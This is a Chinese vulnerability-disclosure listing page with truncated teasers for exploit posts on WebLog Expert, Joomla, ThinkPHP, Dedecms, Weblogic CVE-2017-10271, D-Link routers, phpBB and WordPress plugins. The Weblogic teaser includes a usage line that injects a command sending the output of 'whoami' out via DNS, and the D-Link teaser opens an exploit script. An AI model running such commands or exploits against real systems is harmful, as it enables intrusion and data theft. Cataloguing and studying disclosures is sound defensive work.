当前分类

漏洞公布

WebLog Expert Enterprise 9.4 权限提升漏洞

Software Link: https://www.weblogexpert.com/download.htm Exploit: 1. Login as regular user where WebLog Expert and WebLog Expert Schedule Service are installed 2. Open WebLog Expert and then Schedule 3. Select Add, Ne...

Joomla内核SQL注入漏洞(CVE-2018-8045)分析

我们先看下joomla官网怎么说的: https://developer.joomla.org/security-centre/723-20180301-core-sqli-vulnerability.html User Notes模块由于缺少变量类型转换,导致sql注入的产生。这个漏洞在3.8.6版本被解决。 漏洞介绍很模糊...

thinkphp3.2.3注入漏洞

这个漏洞是基于thinkphp3.2.3开发引起的。 漏洞一 由于oauth_reg方法中调用了login来验证当前会员是否登陆,所以咱们需要注册一个会员帐户再利用该漏洞,这里玩注册用户名和密码均为test123的帐户,然后构造如下cookie: members_bind_...

Dedecms任意用户登录

##前台任意用户户登录 global $dsql; if($kp?me==-1){ $this->M_KeepTime = 3600 * 24 * 7; }else{ $this->M_KeepTime = $kp?me; } $formcache = FALSE; $this->M_ID = $this->GetNum(GetCookie("DedeUserI...

Weblogic(CVE-2017-10271)漏洞Exp

文章作者:莫须有 命令格式:python3 CVE-2017-10271.py url command eg:python3 CVE-2017-10271.py http://test.cve "ping \`whoami\`.dnslog.cve # -*- coding: UTF-8 -*- ''' Created on 2017年12月23日 @author: 莫须有...

D-Link DIR8xx 远程代码执行漏洞

脚本下载: hnap import requests as rq import struct IP = "192.168.0.1" PORT = "80" # Can differ in different version of routers and versions of firmware # SYSTEM_ADDRESS = 0x1B570 # DIR-...

Joomla Photo Contest 1.0.2 SQL Injection Vulnerability

# # # # # # Exploit Title: Joomla! Component Photo Contest 1.0.2- SQL Injection # Dork: N/A # Date: 25.08.2017 # Vendor Homepage: http://keenitsolution.com/ # Software Link: https://codecanyon.net/item/photo-c...

phpBB 3.2.0 Server Side Request Forgery

title: Server Side Request Forgery Vulnerability product: phpBB vulnerable version: 3.2.0 fixed version: 3.2.1 CVE number: impact: Medium homepage: https://www.phpb...

WordPress Ultimate Product Catalogue 4.2.2 Plugin – SQL Injection

# Version: 4.2.2 # Tested on: Ubuntu 16.04 1 - Description: Type user access: register user. $_POST[‘CatID’] is not escaped. http://lenonleite.com.br/en/blog/2017/05/31/english-ultimate-product-catalogue-4-2-2-sql-inj...

WordPress Huge-IT Video Gallery 2.0.4 SQL注入

Advisory ID: DC-2017-01-009 SQL injection Vulnerable Function: $wpdb->get_var( $query ); Vulnerable Variable: $_POST['cat_search'] Vulnerable URL: http://www.vulnerablesite.com/wp-admin/admi...

1234...24

插入图片
返回顶部